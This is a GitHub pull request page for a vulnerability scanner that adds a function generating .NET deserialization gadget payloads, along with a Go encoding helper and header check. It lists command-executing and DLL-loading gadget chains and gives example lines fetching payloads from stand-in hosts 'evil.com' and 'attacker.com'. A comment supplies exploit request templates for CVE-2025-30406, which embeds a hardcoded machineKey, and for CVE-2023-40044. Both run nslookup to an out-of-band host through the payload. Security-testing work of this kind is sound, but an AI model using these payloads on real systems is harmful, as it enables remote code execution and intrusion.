@Ice3man543
Member

Deserialization Gadget Generators

This PR provides unified functions for generating Java and .NET deserialization exploit payloads.

Uses: https://www.vulncheck.com/blog/making-dotnet-gadgets
Based on code in https://github.com/vulncheck-oss/go-exploit/tree/main/dotnet

.NET Deserialization

Function Signature

generate_dotnet_gadget(gadget, cmd, formatter, encoding string) string

Parameters

  • gadget: The gadget chain to use
  • cmd: Command, URL, or data (depends on gadget type)
  • formatter: Serialization formatter to use (defaults to BinaryFormatter)
  • encoding: Output encoding format (defaults to URL-safe base64)

Supported Gadgets

Command-Based Gadgets

These gadgets execute system commands:

  • windows-identity - WindowsIdentity gadget
  • claims-principal - ClaimsPrincipal gadget
  • dataset - DataSet gadget
  • dataset-type-spoof - DataSet with type spoofing
  • object-data-provider - ObjectDataProvider gadget
  • text-formatting-runproperties - TextFormattingRunProperties gadget
  • type-confuse-delegate - TypeConfuseDelegate gadget

cmd format: Command to execute (e.g., "calc", "whoami", "cmd /c dir")

URL-Based Gadgets

These gadgets make HTTP requests to fetch remote payloads:

  • object-ref - Remote object reference
  • veeam-crypto-keyinfo - Veeam CryptoKeyInfo gadget

cmd format: URL (e.g., "http://attacker.com/payload")

XML-Based Gadgets

  • dataset-xmldiffgram - DataSet XML DiffGram

cmd format: XML payload data

DLL-Based Gadgets

  • axhost-state-dll - AxHostState DLL loading
  • dll-reflection - DLL reflection loading

cmd format: Raw DLL bytes or base64-encoded DLL

ViewState Gadget

  • viewstate - ASP.NET ViewState

cmd format: "payloadData:machineKey:generator" (colon-separated)

Prebuilt Gadgets

Any other gadget name will attempt to load from the dotnet package's embedded gadgets using ReadGadget.

Supported Formatters

  • binary or binaryformatter - BinaryFormatter (default)
  • soap or soapformatter - SOAPFormatter
  • soapwithexceptions or soap-exceptions - SOAPFormatter with exceptions
  • los or losformatter - LOSFormatter
  • Empty string - defaults to BinaryFormatter

Supported Encodings

  • raw - Raw binary string
  • hex - Hexadecimal encoding
  • gzip - Gzip compressed
  • gzip-base64 - Gzip + URL-safe base64
  • base64-raw - Standard base64
  • Empty string - URL-safe base64 (default, replaces + with %2B)

Examples

// Windows command execution with BinaryFormatter
payload := generate_dotnet_gadget("windows-identity", "calc", "binary", "base64-raw")

// Remote payload fetch with SOAPFormatter
payload := generate_dotnet_gadget("object-ref", "http://evil.com/payload", "soap", "hex")

// PowerShell execution with default formatter and encoding
payload := generate_dotnet_gadget("claims-principal", "powershell -enc <base64>", "", "")

// ViewState gadget
payload := generate_dotnet_gadget("viewstate", "data:machineKey:generator", "", "base64-raw")

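The encoding table above is the part of this helper a responder meets first: a captured __VIEWSTATE or form field has to be decoded the same way before anyone can say what it contains. The following Go block is an added example written for this page; it is not code from the PR or from the go-exploit repository. It implements the six listed encodings as an encoder plus the matching decoder, and adds a cheap header check for a BinaryFormatter stream that a log-triage script or WAF rule can apply to the decoded bytes. The function names, and the constructed sample stream (a bare serialization header followed by filler, not a gadget chain), are this example's own assumptions.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"encoding/base64"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"io"
	"strings"
)

// encodePayload applies one of the output encodings from the PR description
// to serialized bytes. Function names in this example are assumed, not the PR's.
func encodePayload(raw []byte, encoding string) (string, error) {
	data := raw
	if encoding == "gzip" || encoding == "gzip-base64" {
		data = gzipBytes(raw)
	}
	switch encoding {
	case "raw", "gzip":
		return string(data), nil
	case "hex":
		return hex.EncodeToString(data), nil
	case "base64-raw":
		return base64.StdEncoding.EncodeToString(data), nil
	case "", "gzip-base64": // default: URL-safe base64, '+' written as %2B
		return urlSafeBase64(data), nil
	default:
		return "", fmt.Errorf("unknown encoding %q", encoding)
	}
}

// urlSafeBase64 is standard base64 with '+' replaced by "%2B", as the PR
// defines its default, so the value survives an x-www-form-urlencoded body.
func urlSafeBase64(b []byte) string {
	return strings.ReplaceAll(base64.StdEncoding.EncodeToString(b), "+", "%2B")
}

func gzipBytes(b []byte) []byte {
	var buf bytes.Buffer
	w := gzip.NewWriter(&buf)
	w.Write(b) // writes into a bytes.Buffer cannot fail
	w.Close()
	return buf.Bytes()
}

func gunzipBytes(b []byte) ([]byte, error) {
	r, err := gzip.NewReader(bytes.NewReader(b))
	if err != nil {
		return nil, err
	}
	return io.ReadAll(r) // verifies the gzip checksum at EOF
}

// decodePayload reverses encodePayload: the step a responder takes before
// inspecting a captured __VIEWSTATE or form-field value.
func decodePayload(s, encoding string) ([]byte, error) {
	var data []byte
	var err error
	switch encoding {
	case "raw", "gzip":
		data = []byte(s)
	case "hex":
		data, err = hex.DecodeString(s)
	case "base64-raw":
		data, err = base64.StdEncoding.DecodeString(s)
	case "", "gzip-base64":
		data, err = base64.StdEncoding.DecodeString(strings.ReplaceAll(s, "%2B", "+"))
	default:
		return nil, fmt.Errorf("unknown encoding %q", encoding)
	}
	if err != nil {
		return nil, err
	}
	if encoding == "gzip" || encoding == "gzip-base64" {
		return gunzipBytes(data)
	}
	return data, nil
}

// looksLikeBinaryFormatter checks for a BinaryFormatter SerializationHeaderRecord:
// record type 0x00, then RootId, HeaderId, MajorVersion=1, MinorVersion=0 as
// little-endian int32s (the familiar base64 prefix "AAEAAAD/////AQAAAAAAAAA").
// A triage heuristic for log review or a WAF rule, not a full parser.
func looksLikeBinaryFormatter(b []byte) bool {
	if len(b) < 17 || b[0] != 0x00 {
		return false
	}
	return binary.LittleEndian.Uint32(b[9:13]) == 1 && binary.LittleEndian.Uint32(b[13:17]) == 0
}

// sampleStream is a constructed header plus filler, not a real gadget chain.
var sampleStream = append([]byte{0, 1, 0, 0, 0, 0xff, 0xff, 0xff, 0xff, 1, 0, 0, 0, 0, 0, 0, 0}, "filler"...)

func main() {
	for _, enc := range []string{"", "base64-raw", "hex", "gzip-base64"} {
		out, _ := encodePayload(sampleStream, enc)
		back, _ := decodePayload(out, enc)
		fmt.Printf("%-14q round-trip=%v binaryformatter=%v\n", enc, bytes.Equal(back, sampleStream), looksLikeBinaryFormatter(back))
	}
}
```

The header check only looks at the first 17 bytes, so a value that is gzip-compressed or hex-encoded must go through decodePayload first; running the check on the still-encoded form gives a false negative, which is the usual reason such rules miss the "gzip-base64" variant.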
@Ice3man543 Ice3man543 self-assigned this Nov 22, 2025
@Ice3man543 Ice3man543 linked an issue Nov 22, 2025 that may be closed by this pull request
@Ice3man543
Member Author

projectdiscovery/nuclei#4204 - requested here originally

Example usages:

For CVE-2025-30406, which currently uses a hardcoded gadget (verified working with OOB):

variables:
  inner_payload: '{{generate_dotnet_gadget("text-formatting-runproperties", "powershell nslookup {{interactsh-url}}", "los", "base64-raw")}}'
  viewstate_payload: '{{generate_dotnet_gadget("viewstate", inner_payload + ":5496832242CC3228E292EEFFCDA089149D789E0C4D7C1A5D02BC542F7C6279BE9DD770C9EDD5D67C66B7E621411D3E57EA181BBF89FD21957DCDDFACFD926E16:3FE2630A", "", "base64-raw")}}'

http:
  - raw:
      - |
        POST /portal/loginpage.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        __LASTFOCUS=&__VIEWSTATE={{url_encode(viewstate_payload)}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
        condition: and

For CVE-2023-40044 (this one is yet to be verified):

  - raw:
      - |
        POST /AHT/AhtApiService.asmx/AuthUser HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name=""

        ::AHT_DEFAULT_UPLOAD_PARAMETER::{{generate_dotnet_gadget("type-confuse-delegate", "cmd.exe /C nslookup {{interactsh-url}}", "binary", "base64-raw")}}
        ------WebKitFormBoundary7MA4YWxkTrZu0gW--

Member

@dwisiswant0 dwisiswant0 left a comment


banger

@Ice3man543 Ice3man543 merged commit 9e727f8 into main Nov 23, 2025
7 checks passed
@Ice3man543 Ice3man543 deleted the add-dotnet-deserialization-helpers branch November 23, 2025 11:05

Development

Successfully merging this pull request may close these issues.

Add support for dotnet deserialization helpers

3 participants